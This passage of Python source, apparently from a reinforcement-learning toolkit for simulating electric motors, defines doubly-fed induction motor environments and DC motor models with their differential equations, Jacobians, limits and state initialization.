Termination if current limits are violated. The terminal reward -10 is used as reward.
(Have a look at the reward functions.)
"""
def __init__(self, tau=1e-4, converter='Cont-Multi', subconverters=('Cont-4QC', 'Cont-1QC'), **kwargs):
# Docstring in Base Class
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
```
#### File: envs/gym_im/doubly_fed_induc_motor_env.py
```python
from ...core import ElectricMotorEnvironment
from ...physical_systems.physical_systems import DoublyFedInductionMotorSystem
from ...reference_generators import WienerProcessReferenceGenerator
from ...reward_functions import WeightedSumOfErrors
class DoublyFedInductionMotorEnvironment(ElectricMotorEnvironment):
def __init__(self, motor='DFIM', reward_function=None, reference_generator=None, **kwargs):
"""
Args:
motor(ElectricMotor): Electric Motor used in the PhysicalSystem
reward_function(RewardFunction): Reward Function for the environment
reference_generator(ReferenceGenerator): Reference Generator for the environment
            kwargs(dict): Further kwargs to pass to the superclass and the submodules
"""
physical_system = DoublyFedInductionMotorSystem(motor=motor, **kwargs)
reference_generator = reference_generator or WienerProcessReferenceGenerator(**kwargs)
reward_function = reward_function or WeightedSumOfErrors(**kwargs)
super().__init__(
physical_system, reference_generator=reference_generator, reward_function=reward_function, **kwargs
)
class DiscDoublyFedInductionMotorEnvironment(DoublyFedInductionMotorEnvironment):
"""
Description:
        Environment to simulate a discretely controlled Doubly-Fed Induction Motor (DFIM).
Key:
`DFIMDisc-v1`
Default Modules:
Physical System:
SCMLSystem/DcMotorSystem with:
| IdealVoltageSupply
| DiscB6BridgeConverter
                | DoublyFedInductionMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver
| tau=1e-5
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity. 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Variables:
``['omega' , 'torque', 'i_sa', 'i_sb', 'i_sc', 'i_sd', 'i_sq', 'u_sa', 'u_sb', 'u_sc', 'u_sd', 'u_sq',``
``'i_ra', 'i_rb', 'i_rc', 'i_rd', 'i_rq', 'u_ra', 'u_rb', 'u_rc', 'u_rd', 'u_rq', 'epsilon', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 0],
high=[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: MultiDiscrete([8, 8])
Reward:
.. math::
reward = (\omega - \omega^*) / (2 * \omega_{lim})
Starting State:
Zeros on all state variables.
Episode Termination:
Current limits (i_a ,i_b, i_c) are observed and the reference generation is continuous.
Therefore, an episode ends only, when current limits have been violated.
Limit Violation Reward:
.. math::
limit~violation~reward = -1 / (1- \gamma ) = -10 (Default: \gamma = 0.9)
u_sup and u_nominal must be the same
"""
def __init__(self, tau=1e-5, converter='Disc-Multi', subconverters=('Disc-B6C', 'Disc-B6C'), **kwargs):
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
class ContDoublyFedInductionMotorEnvironment(DoublyFedInductionMotorEnvironment):
"""
Description:
Environment to simulate a continuously controlled Doubly-Fed Induction Motor (DFIM).
Key:
`DFIMCont-v1`
Default Modules:
Physical System:
SCMLSystem/DoublyFedInductionMotorSystem with:
| IdealVoltageSupply
| ContinuousB6BridgeConverter
| DoublyFedInductionMotor
| PolynomialStaticLoad
| GaussianWhiteNoiseGenerator
| EulerSolver
| tau=1e-4
Reference Generator:
WienerProcessReferenceGenerator
Reference Quantity: 'omega'
Reward Function:
WeightedSumOfErrors(reward_weights= {'omega': 1 })
Visualization:
ElectricMotorVisualization (Dummy for no Visualization)
State Variables:
``['omega' , 'torque', 'i_sa', 'i_sb', 'i_sc', 'i_sd', 'i_sq', 'u_sa', 'u_sb', 'u_sc', 'u_sd', 'u_sq',``
``'i_ra', 'i_rb', 'i_rc', 'i_rd', 'i_rq', 'u_ra', 'u_rb', 'u_rc', 'u_rd', 'u_rq', 'epsilon', 'u_sup']``
Observation Space:
Type: Tuple(State_Space, Reference_Space)
State Space:
Box(low=[-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 0],
high=[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
Reference Space:
Box(low=[-1], high=[1])
Action Space:
Type: Box(low=[-1, -1, -1, -1, -1, -1], high=[1, 1, 1, 1, 1, 1])
Reward:
.. math::
reward = (\omega - \omega^*) / (2 * \omega_{lim})
Starting State:
Zeros on all state variables.
Episode Termination:
Current limits (i_sa, i_sb, i_sc) are observed and the reference generation is continuous.
Therefore, an episode ends only when the current limits have been violated.
Limit Violation Reward:
.. math::
limit~violation~reward = -1 / (1 - \gamma) = -10 \quad (\text{default: } \gamma = 0.9)
u_sup and u_nominal must be the same
"""
def __init__(self, tau=1e-4, converter='Cont-Multi', subconverters=('Cont-B6C', 'Cont-B6C'), **kwargs):
super().__init__(tau=tau, converter=converter, subconverters=subconverters, **kwargs)
```
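A minimal usage sketch for the environment classes above, illustrative only: it assumes the file headers map directly to import paths, that the observation is the documented `Tuple(State_Space, Reference_Space)`, and that the classic gym step signature `(observation, reward, done, info)` applies; the random agent and the step budget are arbitrary choices, not part of the library.
```python
# Illustrative sketch (not part of the package): random-agent rollout on the
# continuously controlled DFIM environment defined above.
from gym_electric_motor.envs.gym_im.doubly_fed_induc_motor_env import (
    ContDoublyFedInductionMotorEnvironment,
)

env = ContDoublyFedInductionMotorEnvironment()
state, reference = env.reset()  # observation is Tuple(state, reference)
cumulated_reward = 0.0
for _ in range(1000):  # arbitrary step budget
    action = env.action_space.sample()  # Box(low=[-1]*6, high=[1]*6)
    (state, reference), reward, done, _ = env.step(action)
    cumulated_reward += reward
    if done:  # current limit violated -> reset and continue
        state, reference = env.reset()
print(cumulated_reward)
```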
#### File: gym_electric_motor/physical_systems/electric_motors.py
```python
import numpy as np
import math
from scipy.stats import truncnorm
class ElectricMotor:
"""
Base class for all technical electrical motor models.
A motor consists of the ode-state. These are the dynamic quantities of its ODE.
For example:
ODE-State of a DC-shunt motor: `` [i_a, i_e ] ``
* i_a: Anchor circuit current
* i_e: Exciting circuit current
Each electric motor can be parametrized by a dictionary of motor parameters,
the nominal state dictionary and the limit dictionary.
Initialization is controlled by an initializer dict that either sets constant
state values or draws random values from a given interval.
The dict should look like:
{'states'(dict): state names and initial values,
'interval'(array-like): boundaries for each state
(only for random init), shape (num states, 2),
'random_init'(str): 'uniform' or 'normal',
'random_params'(tuple): mue(float), sigma(int)}
Example initializer(dict) for constant initialization:
{ 'states': {'omega': 16.0}}
Example initializer(dict) for random initialization:
{ 'random_init': 'normal'}
"""
#: Parameter indicating if the class is implementing the optional jacobian function
HAS_JACOBIAN = False
#: CURRENTS_IDX(list(int)): Indices for accessing all motor currents.
CURRENTS_IDX = []
#: CURRENTS(list(str)): List of the motor currents names
CURRENTS = []
#: VOLTAGES(list(str)): List of the motor input voltages names
VOLTAGES = []
#: _default_motor_parameter(dict): Default parameter dictionary for the motor
_default_motor_parameter = {}
#: _default_nominal_values(dict(float)): Default nominal motor state array
_default_nominal_values = {}
#: _default_limits(dict(float)): Default motor limits (0 for unbounded limits)
_default_limits = {}
#: _default_initializer(dict): Default initial motor-state values
_default_initializer = {'states': {},
'interval': None,
'random_init': None,
'random_params': None}
#: _default_initial_limits(dict): Default limit for initialization
_default_initial_limits = {}
@property
def nominal_values(self):
"""
Readonly motors nominal values.
Returns:
dict(float): Current nominal values of the motor.
"""
return self._nominal_values
@property
def limits(self):
"""
Readonly motors limit state array. Entries are set to the maximum physical possible values
in case of unspecified limits.
Returns:
dict(float): Limits of the motor.
"""
return self._limits
@property
def motor_parameter(self):
"""
Returns:
dict(float): The motors parameter dictionary
"""
return self._motor_parameter
@property
def initializer(self):
"""
Returns:
dict: Motor initial state and additional initializer parameter
"""
return self._initializer
@property
def initial_limits(self):
"""
Returns:
dict: nominal motor limits for choosing initial values
"""
return self._initial_limits
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, initial_limits=None,
**__):
"""
:param motor_parameter: Motor parameter dictionary. Contents specified
for each motor.
:param nominal_values: Nominal values for the motor quantities.
:param limit_values: Limits for the motor quantities.
:param motor_initializer: Initial motor states (currents); either constant
or sampled ('uniform' / 'gaussian') from a given interval
or from the nominal motor values
:param initial_limits: Limits for the initial state values
"""
motor_parameter = motor_parameter or {}
self._motor_parameter = self._default_motor_parameter.copy()
self._motor_parameter.update(motor_parameter)
limit_values = limit_values or {}
self._limits = self._default_limits.copy()
self._limits.update(limit_values)
nominal_values = nominal_values or {}
self._nominal_values = self._default_nominal_values.copy()
self._nominal_values.update(nominal_values)
motor_initializer = motor_initializer or {}
self._initializer = self._default_initializer.copy()
self._initializer.update(motor_initializer)
self._initial_states = {}
if self._initializer['states'] is not None:
self._initial_states.update(self._initializer['states'])
# initialize limits; in general they do not need to be changed
# during training or episodes
initial_limits = initial_limits or {}
self._initial_limits = self._nominal_values.copy()
self._initial_limits.update(initial_limits)
# preventing wrong user input for the basic case
assert isinstance(self._initializer, dict), 'wrong initializer'
def electrical_ode(self, state, u_in, omega, *_):
"""
Calculation of the derivatives of each motor state variable for the given inputs / The motors ODE-System.
Args:
state(ndarray(float)): The motors state.
u_in(list(float)): The motors input voltages.
omega(float): Angular velocity of the motor
Returns:
ndarray(float): Derivatives of the motors ODE-system for the given inputs.
"""
raise NotImplementedError
def electrical_jacobian(self, state, u_in, omega, *_):
"""
Calculation of the jacobian of each motor ODE for the given inputs / The motors ODE-System.
Overriding this method is optional for each subclass. If it is overridden, the parameter HAS_JACOBIAN must also
be set to True. Otherwise, the jacobian will not be called.
Args:
state(ndarray(float)): The motors state.
u_in(list(float)): The motors input voltages.
omega(float): Angular velocity of the motor
Returns:
Tuple(ndarray, ndarray, ndarray):
[0]: Derivatives of all electrical motor states over all electrical motor states shape:(states x states)
[1]: Derivatives of all electrical motor states over omega shape:(states,)
[2]: Derivative of Torque over all motor states shape:(states,)
"""
pass
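# Shape note (illustrative): for a motor with two electrical states, an
# implementation returns a tuple of a (2, 2) system matrix, a (2,)-vector
# d(states)/d(omega) and a (2,)-vector d(torque)/d(states), matching the
# shapes documented above.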
def initialize(self,
state_space,
state_positions,
**__):
"""
Initializes given state values. Values can be given as a constant or
sampled random out of a statistical distribution. Initial value is in
range of the nominal values or a given interval. Values are written in
initial_states attribute
Args:
state_space(gym.Box): normalized state space boundaries (given by
physical system)
state_positions(dict): indexes of system states (given by physical
system)
Returns:
"""
# for organization purposes
interval = self._initializer['interval']
random_dist = self._initializer['random_init']
random_params = self._initializer['random_params']
self._initial_states.update(self._default_initializer['states'])
if self._initializer['states'] is not None:
self._initial_states.update(self._initializer['states'])
# different limits for InductionMotor
if any(map(lambda state: state in self._initial_states.keys(),
['psi_ralpha', 'psi_rbeta'])):
nominal_values_ = [self._initial_limits[state]
for state in self._initial_states]
upper_bound = np.asarray(np.abs(nominal_values_), dtype=float)
# state space for induction envs based on the documentation:
# ['i_salpha', 'i_sbeta', 'psi_ralpha', 'psi_rbeta', 'epsilon']
# hard-coded for the induction motors currently given in the toolbox
state_space_low = np.array([-1, -1, -1, -1, -1])
lower_bound = upper_bound * state_space_low
else:
if isinstance(self._nominal_values, dict):
nominal_values_ = [self._nominal_values[state]
for state in self._initial_states.keys()]
nominal_values_ = np.asarray(nominal_values_)
else:
nominal_values_ = np.asarray(self._nominal_values)
state_space_idx = [state_positions[state] for state in
self._initial_states.keys()]
upper_bound = np.asarray(nominal_values_, dtype=float)
lower_bound = upper_bound * \
np.asarray(state_space.low, dtype=float)[state_space_idx]
# clip nominal boundaries to user defined
if interval is not None:
lower_bound = np.clip(lower_bound,
a_min=
np.asarray(interval, dtype=float).T[0],
a_max=None)
upper_bound = np.clip(upper_bound,
a_min=None,
a_max=
np.asarray(interval, dtype=float).T[1])
# random initialization for each motor state (current, epsilon)
if random_dist is not None:
if random_dist == 'uniform':
initial_value = (upper_bound - lower_bound) * \
np.random.random_sample(
len(self._initial_states.keys())) + \
lower_bound
# writing initial values in initial_states dict
random_states = \
{state: initial_value[idx]
for idx, state in enumerate(self._initial_states.keys())}
self._initial_states.update(random_states)
elif random_dist in ['normal', 'gaussian']:
# specific input or middle of interval
mue = random_params[0] or (upper_bound - lower_bound) / 2 + lower_bound
sigma = random_params[1] or 1
a, b = (lower_bound - mue) / sigma, (upper_bound - mue) / sigma
initial_value = truncnorm.rvs(a, b,
loc=mue,
scale=sigma,
size=(len(self._initial_states.keys())))
# writing initial values in initial_states dict
random_states = \
{state: initial_value[idx]
for idx, state in enumerate(self._initial_states.keys())}
self._initial_states.update(random_states)
else:
# todo implement other distribution
raise NotImplementedError
# constant initialization for each motor state (current, epsilon)
elif self._initial_states is not None:
initial_value = np.atleast_1d(list(self._initial_states.values()))
# check init_value meets interval boundaries
if ((lower_bound <= initial_value).all()
and (initial_value <= upper_bound).all()):
initial_states_ = \
{state: initial_value[idx]
for idx, state in enumerate(self._initial_states.keys())}
self._initial_states.update(initial_states_)
else:
raise Exception('Initialization value has to be within nominal boundaries')
else:
raise Exception('No matching Initialization Case')
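# Illustrative examples (added for clarity, mirroring the class docstring):
# motor_initializer={'states': {'i': 0.0}} yields a constant reset to i = 0,
# while motor_initializer={'states': {'i': 0.0}, 'random_init': 'uniform',
# 'interval': [[0, 20]]} samples i uniformly from the nominal bounds clipped
# to [0, 20].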
def reset(self,
state_space,
state_positions,
**__):
"""
Reset the motors state to a new initial state. (Default 0)
Args:
state_space(gym.Box): normalized state space boundaries
state_positions(dict): indexes of system states
Returns:
numpy.ndarray(float): The initial motor states.
"""
# check for valid initializer
if self._initializer and self._initializer['states']:
self.initialize(state_space, state_positions)
return np.asarray(list(self._initial_states.values()))
else:
return np.zeros(len(self.CURRENTS))
def i_in(self, state):
"""
Args:
state(ndarray(float)): ODE state of the motor
Returns:
list(float): List of all currents flowing into the motor.
"""
raise NotImplementedError
def _update_limits(self, limits_d=None, nominal_d=None):
"""Replace missing limits and nominal values with physical maximums.
Args:
limits_d(dict): Mapping: quantity to its limit if not specified
nominal_d(dict): Mapping: quantity to its nominal value if not specified
"""
# avoid mutable default arguments; both dicts are modified below
limits_d = limits_d if limits_d is not None else {}
nominal_d = nominal_d if nominal_d is not None else {}
# omega is replaced the same way for all motor types
limits_d.update(dict(omega=self._default_limits['omega']))
for qty, lim in limits_d.items():
if self._limits.get(qty, 0) == 0:
self._limits[qty] = lim
for entry in self._limits.keys():
if self._nominal_values.get(entry, 0) == 0:
self._nominal_values[entry] = nominal_d.get(entry, None) or \
self._limits[entry]
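# Resolution order (illustrative): a limit explicitly set by the user is kept;
# a limit left at 0 falls back to the physical maximum passed via limits_d;
# nominal values fall back to nominal_d and finally to the corresponding limit.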
def _update_initial_limits(self, nominal_new={}, **kwargs):
"""
Complete initial states with further state limits
Args:
nominal_new(dict): new/further state limits
"""
self._initial_limits.update(nominal_new)
class DcMotor(ElectricMotor):
"""
The DcMotor and its subclasses implement the technical system of a dc motor.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 0.78 Armature circuit resistance
r_e Ohm 25 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.2 Exciting circuit inductance
l_e_prime H 0.0094 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_a A Armature circuit current
i_e A Exciting circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u_a V Armature circuit voltage
u_e            V      Exciting circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i_a Armature current
i_e Exciting current
omega Angular Velocity
torque Motor generated torque
u_a Armature Voltage
u_e Exciting Voltage
======== ===========================================================
"""
# Indices for array accesses
I_A_IDX = 0
I_E_IDX = 1
CURRENTS_IDX = [0, 1]
CURRENTS = ['i_a', 'i_e']
VOLTAGES = ['u_a', 'u_e']
_default_motor_parameter = {
'r_a': 0.78, 'r_e': 25, 'l_a': 6.3e-3, 'l_e': 1.2, 'l_e_prime': 0.0094,
'j_rotor': 0.017,
}
_default_nominal_values = {'omega': 368, 'torque': 0.0, 'i_a': 50,
'i_e': 1.2, 'u': 420}
_default_limits = {'omega': 500, 'torque': 0.0, 'i_a': 75, 'i_e': 2,
'u': 420}
_default_initializer = {'states': {'i_a': 0.0, 'i_e': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def __init__(self, motor_parameter=None, nominal_values=None,
limit_values=None, motor_initializer=None, **__):
# Docstring of superclass
super().__init__(motor_parameter, nominal_values,
limit_values, motor_initializer)
#: Matrix that contains the constant parameters of the systems equation for faster computation
self._model_constants = None
self._update_model()
self._update_limits()
def _update_model(self):
"""
Update the motors model parameters with the motor parameters.
Called internally when the motor parameters are changed or the motor is initialized.
"""
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['r_a'], 0, -mp['l_e_prime'], 1, 0],
[0, -mp['r_e'], 0, 0, 1]
])
self._model_constants[self.I_A_IDX] = self._model_constants[self.I_A_IDX] / mp['l_a']
self._model_constants[self.I_E_IDX] = self._model_constants[self.I_E_IDX] / mp['l_e']
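# Reading of the model constants above (illustrative): applied to the input
# vector [i_a, i_e, omega * i_e, u_a, u_e] used in electrical_ode, the rows encode
#   d(i_a)/dt = (-r_a * i_a - l_e_prime * omega * i_e + u_a) / l_a
#   d(i_e)/dt = (-r_e * i_e + u_e) / l_e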
def torque(self, currents):
# Docstring of superclass
return self._motor_parameter['l_e_prime'] * currents[self.I_A_IDX] * \
currents[self.I_E_IDX]
def i_in(self, currents):
# Docstring of superclass
return list(currents)
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return np.matmul(self._model_constants, np.array([
state[self.I_A_IDX],
state[self.I_E_IDX],
omega * state[self.I_E_IDX],
u_in[0],
u_in[1],
]))
def get_state_space(self, input_currents, input_voltages):
"""
Calculate the possible normalized state space for the motor as a tuple of dictionaries "low" and "high".
Args:
input_currents: Tuple of the two converters possible output currents.
input_voltages: Tuple of the two converters possible output voltages.
Returns:
tuple(dict,dict): Dictionaries defining if positive and negative values are possible for each motors state.
"""
a_converter = 0
e_converter = 1
low = {
'omega': -1 if input_voltages.low[a_converter] == -1
or input_voltages.low[e_converter] == -1 else 0,
'torque': -1 if input_currents.low[a_converter] == -1
or input_currents.low[e_converter] == -1 else 0,
'i_a': -1 if input_currents.low[a_converter] == -1 else 0,
'i_e': -1 if input_currents.low[e_converter] == -1 else 0,
'u_a': -1 if input_voltages.low[a_converter] == -1 else 0,
'u_e': -1 if input_voltages.low[e_converter] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i_a': 1,
'i_e': 1,
'u_a': 1,
'u_e': 1
}
return low, high
def _update_limits(self, limits_d=None):
# Docstring of superclass
limits_d = limits_d if limits_d is not None else {}
# torque is replaced the same way for all DC motors
limits_d.update(dict(torque=self.torque([self._limits[state] for state
in self.CURRENTS])))
super()._update_limits(limits_d)
class DcShuntMotor(DcMotor):
"""
The DcShuntMotor is a DC motor with parallel armature and exciting circuit connected to one input voltage.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 0.78 Armature circuit resistance
r_e Ohm 25 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.2 Exciting circuit inductance
l_e_prime H 0.0094 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i_a A Armature circuit current
i_e A Exciting circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Voltage applied to both circuits
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i_a Armature current
i_e Exciting current
omega Angular Velocity
torque Motor generated torque
u Voltage
======== ===========================================================
"""
HAS_JACOBIAN = True
VOLTAGES = ['u']
_default_nominal_values = {'omega': 368, 'torque': 0.0, 'i_a': 50,
'i_e': 1.2, 'u': 420}
_default_limits = {'omega': 500, 'torque': 0.0, 'i_a': 75, 'i_e': 2,
'u': 420}
_default_initializer = {'states': {'i_a': 0.0, 'i_e': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def i_in(self, state):
# Docstring of superclass
return [state[self.I_A_IDX] + state[self.I_E_IDX]]
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return super().electrical_ode(state, (u_in[0], u_in[0]), omega)
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([
[-mp['r_a'] / mp['l_a'], -mp['l_e_prime'] / mp['l_a'] * omega],
[0, -mp['r_e'] / mp['l_e']]
]),
np.array([-mp['l_e_prime'] * state[self.I_E_IDX] / mp['l_a'], 0]),
np.array([mp['l_e_prime'] * state[self.I_E_IDX],
mp['l_e_prime'] * state[self.I_A_IDX]])
)
def get_state_space(self, input_currents, input_voltages):
"""
Calculate the possible normalized state space for the motor as a tuple of dictionaries "low" and "high".
Args:
input_currents: The converters possible output currents.
input_voltages: The converters possible output voltages.
Returns:
tuple(dict,dict): Dictionaries defining if positive and negative values are possible for each motors state.
"""
low = {
'omega': 0,
'torque': -1 if input_currents.low[0] == -1 else 0,
'i_a': -1 if input_currents.low[0] == -1 else 0,
'i_e': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i_a': 1,
'i_e': 1,
'u': 1,
}
return low, high
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limit_agenda = \
{'u': self._default_limits['u'],
'i_a': self._limits.get('i', None) or
self._limits['u'] / r_a,
'i_e': self._limits.get('i', None) or
self._limits['u'] / self.motor_parameter['r_e'],
}
super()._update_limits(limit_agenda)
class DcSeriesMotor(DcMotor):
"""
The DcSeriesMotor is a DcMotor with an armature and exciting circuit connected in series to one input voltage.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 2.78 Armature circuit resistance
r_e Ohm 1.0 Exciting circuit resistance
l_a H 6.3e-3 Armature circuit inductance
l_e H 1.6e-3 Exciting circuit inductance
l_e_prime H 0.05 Effective excitation inductance
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i A Circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i Circuit Current
omega Angular Velocity
torque Motor generated torque
u Circuit Voltage
======== ===========================================================
"""
HAS_JACOBIAN = True
I_IDX = 0
CURRENTS_IDX = [0]
CURRENTS = ['i']
VOLTAGES = ['u']
_default_motor_parameter = {
'r_a': 2.78, 'r_e': 1.0, 'l_a': 6.3e-3, 'l_e': 1.6e-3,
'l_e_prime': 0.05, 'j_rotor': 0.017,
}
_default_nominal_values = dict(omega=80, torque=0.0, i=50, u=420)
_default_limits = dict(omega=100, torque=0.0, i=100, u=420)
_default_initializer = {'states': {'i': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['r_a'] - mp['r_e'], -mp['l_e_prime'], 1]
])
self._model_constants[self.I_IDX] = self._model_constants[self.I_IDX] / (mp['l_a'] + mp['l_e'])
def torque(self, currents):
# Docstring of superclass
return super().torque([currents[self.I_IDX], currents[self.I_IDX]])
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
return np.matmul(
self._model_constants,
np.array([
state[self.I_IDX],
omega * state[self.I_IDX],
u_in[0]
])
)
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limits_agenda = {
'u': self._default_limits['u'],
'i': self._limits['u'] / (r_a + self._motor_parameter['r_e']),
}
super()._update_limits(limits_agenda)
def get_state_space(self, input_currents, input_voltages):
# Docstring of superclass
low = {
'omega': 0,
'torque': 0,
'i': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i': 1,
'u': 1,
}
return low, high
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([[-(mp['r_a'] + mp['r_e'] + mp['l_e_prime'] * omega) / (
mp['l_a'] + mp['l_e'])]]),
np.array([-mp['l_e_prime'] * state[self.I_IDX] / (
mp['l_a'] + mp['l_e'])]),
np.array([2 * mp['l_e_prime'] * state[self.I_IDX]])
)
class DcPermanentlyExcitedMotor(DcMotor):
"""
The DcPermanentlyExcitedMotor is a DcMotor with a Permanent Magnet instead of the excitation circuit.
===================== ========== ============= ===========================================
Motor Parameter Unit Default Value Description
===================== ========== ============= ===========================================
r_a Ohm 25.0 Armature circuit resistance
l_a H 3.438e-2 Armature circuit inductance
psi_e Wb 18 Magnetic Flux of the permanent magnet
j_rotor kg/m^2 0.017 Moment of inertia of the rotor
===================== ========== ============= ===========================================
=============== ====== =============================================
Motor Currents Unit Description
=============== ====== =============================================
i A Circuit current
=============== ====== =============================================
=============== ====== =============================================
Motor Voltages Unit Description
=============== ====== =============================================
u V Circuit voltage
=============== ====== =============================================
======== ===========================================================
Limits / Nominal Value Dictionary Entries:
-------- -----------------------------------------------------------
Entry Description
======== ===========================================================
i Circuit Current
omega Angular Velocity
torque Motor generated torque
u Circuit Voltage
======== ===========================================================
"""
I_IDX = 0
CURRENTS_IDX = [0]
CURRENTS = ['i']
VOLTAGES = ['u']
HAS_JACOBIAN = True
_default_motor_parameter = {
'r_a': 25.0, 'l_a': 3.438e-2, 'psi_e': 18, 'j_rotor': 0.017
}
_default_nominal_values = dict(omega=22, torque=0.0, i=16, u=400)
_default_limits = dict(omega=50, torque=0.0, i=25, u=400)
_default_initializer = {'states': {'i': 0.0},
'interval': None,
'random_init': None,
'random_params': (None, None)}
# placeholder for omega, currents and u_in
_ode_placeholder = np.zeros(2 + len(CURRENTS_IDX), dtype=np.float64)
def torque(self, state):
# Docstring of superclass
return self._motor_parameter['psi_e'] * state[self.I_IDX]
def _update_model(self):
# Docstring of superclass
mp = self._motor_parameter
self._model_constants = np.array([
[-mp['psi_e'], -mp['r_a'], 1.0]
])
self._model_constants[self.I_IDX] /= mp['l_a']
def i_in(self, state):
# Docstring of superclass
return state[self.CURRENTS_IDX]
def electrical_ode(self, state, u_in, omega, *_):
# Docstring of superclass
self._ode_placeholder[:] = [omega] + np.atleast_1d(state[self.I_IDX]).tolist() + [u_in[0]]
return np.matmul(self._model_constants, self._ode_placeholder)
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([[-mp['r_a'] / mp['l_a']]]),
np.array([-mp['psi_e'] / mp['l_a']]),
np.array([mp['psi_e']])
)
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limits_agenda = {
'u': self._default_limits['u'],
'i': self._limits['u'] / r_a,
}
super()._update_limits(limits_agenda)
def get_state_space(self, input_currents, input_voltages):
# Docstring of superclass
low = {
'omega': -1 if input_voltages.low[0] == -1 else 0,
'torque': -1 if input_currents.low[0] == -1 else 0,
'i': -1 if input_currents.low[0] == -1 else 0,
'u': -1 if input_voltages.low[0] == -1 else 0,
}
high = {
'omega': 1,
'torque': 1,
'i': 1,
'u': 1,
}
return low, high
class DcExternallyExcitedMotor(DcMotor):
# Equals DC Base Motor
HAS_JACOBIAN = True
def electrical_jacobian(self, state, u_in, omega, *_):
mp = self._motor_parameter
return (
np.array([
[-mp['r_a'] / mp['l_a'], -mp['l_e_prime'] / mp['l_a'] * omega],
[0, -mp['r_e'] / mp['l_e']]
]),
np.array([-mp['l_e_prime'] * state[self.I_E_IDX] / mp['l_a'], 0]),
np.array([mp['l_e_prime'] * state[self.I_E_IDX],
mp['l_e_prime'] * state[self.I_A_IDX]])
)
def _update_limits(self):
# Docstring of superclass
# R_a might be 0, protect against that
r_a = 1 if self._motor_parameter['r_a'] == 0 else self._motor_parameter['r_a']
limit_agenda = \
{'u_a': self._default_limits['u'],
'u_e': self._default_limits['u'],
'i_a': self._limits.get('i', None) or
self._limits['u'] / r_a,
'i_e': self._limits.get('i', None) or
self._limits['u'] / self.motor_parameter['r_e'],
}
super()._update_limits(limit_agenda)
class ThreePhaseMotor(ElectricMotor):
"""
The ThreePhaseMotor and its subclasses implement the technical system of Three Phase Motors.
This includes the system equations, the motor parameters of the equivalent circuit diagram,
as well as limits and bandwidth.
"""
# transformation matrix from abc to alpha-beta representation
